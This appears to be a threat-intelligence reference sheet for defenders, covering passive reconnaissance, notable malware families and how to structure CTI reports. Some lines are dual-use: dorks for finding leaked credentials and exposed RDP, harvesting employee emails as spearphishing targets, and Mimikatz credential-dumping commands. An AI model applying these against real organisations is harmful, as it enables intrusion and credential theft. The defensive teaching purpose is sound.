Intel decayIPs expire faster (days-weeks) than domains (weeks-months) than hashes (stable) than TTPs (months-years)
Passive Reconnaissance Techniques
WHOIS lookupwhois domain.com — registrant, registrar, creation date, nameservers. Old domains = higher legitimacy signal
Passive DNSHistorical IP resolutions for a domain — CIRCL.lu, RiskIQ, Shodan. Pivot: what else resolved to this IP?
Certificate Transparencycrt.sh — all SSL certs issued for a domain. Find subdomains from cert SANs without active scanning
ASN lookupbgp.he.net — find all IP ranges owned by an org or hosting provider. Identify attacker infrastructure patterns
Reverse IP lookupFind all domains hosted on same IP — shared hosting pivot. Tools: VirusTotal, SecurityTrails, RiskIQ
Google dorks for intelsite:pastebin.com "company.com" — find leaked credentials, internal data, API keys in paste sites
LinkedIn OSINTEmployee names → email format guess (first.last@company.com) → credential stuffing or spearphish targets
Shodan dorksorg:"Company Name" port:3389 — find exposed RDP. ssl.cert.subject.cn:"domain.com" — find all their certs
Hunter.io / phonebook.czEmail address discovery for a domain — useful for phishing simulation and breach impact assessment
theHarvestertheHarvester -d company.com -b google,bing,linkedin — aggregate OSINT from multiple sources
Malware Family Reference
FamilyTypeKey Characteristics
Cobalt StrikeC2 FrameworkBeacon payload, malleable C2 profiles, team server. Legitimate pentest tool widely abused by threat actors. JARM fingerprint is well-known.
EmotetBanking Trojan / LoaderEmail-delivered, macro-based. Modular — loads TrickBot, QBot, ransomware. Survived takedown, re-emerged. Spreads via contact list harvesting.
QBot (Qakbot)Banking Trojan / LoaderThread-hijacking phishing emails, living-off-the-land, loads Black Basta/RansomHouse. Disrupted 2023 by FBI operation.
MimikatzCredential ToolIn-memory credential extraction from LSASS. sekurlsa::logonpasswords, kerberos::golden. Detected by most EDR; many alternatives exist.
WannaCryRansomware / WormNSA EternalBlue (MS17-010) exploit. Kill-switch domain registration stopped spread. Attributed to Lazarus Group (DPRK). Still active on unpatched systems.
BlackCat / ALPHVRaaSRust-based ransomware, cross-platform (Windows/Linux/ESXi), triple extortion (encrypt + exfil + DDoS). Targeted MGM, Change Healthcare.
AgentTeslaRAT / InfostealerCredential stealer targeting browsers, email clients, FTP clients. Delivered via phishing. C2 via SMTP/Telegram/FTP.
SliverC2 FrameworkOpen-source Go-based C2 alternative to Cobalt Strike. mTLS, WireGuard transport. Growing adoption by threat actors as CS alternative.
CTI Report Writing
Executive Summary2-3 sentences: what happened, who is affected, what to do. Non-technical language. Business impact focus.
Key FindingsBullet points of critical IOCs, TTPs used, affected systems. Link each TTP to MITRE ATT&CK ID.
TimelineChronological sequence of attacker activity in UTC. Include: initial access → persistence → lateral movement → impact.
IOC TableType | Value | Context | First Seen | Confidence. Include hash, IP, domain, URL with TLP marking.
ATT&CK HeatmapExport Navigator layer showing all observed techniques — attach as appendix for blue team.
RecommendationsPrioritized: Immediate (block IOCs, patch CVE) → Short-term (detection rules) → Long-term (architecture changes).
TLP MarkingMark every page header/footer and IOC table with appropriate TLP. Default to TLP:AMBER unless cleared for wider sharing.
ReferencesLink to vendor advisories, CVE entries, prior campaign reports, MITRE ATT&CK technique pages.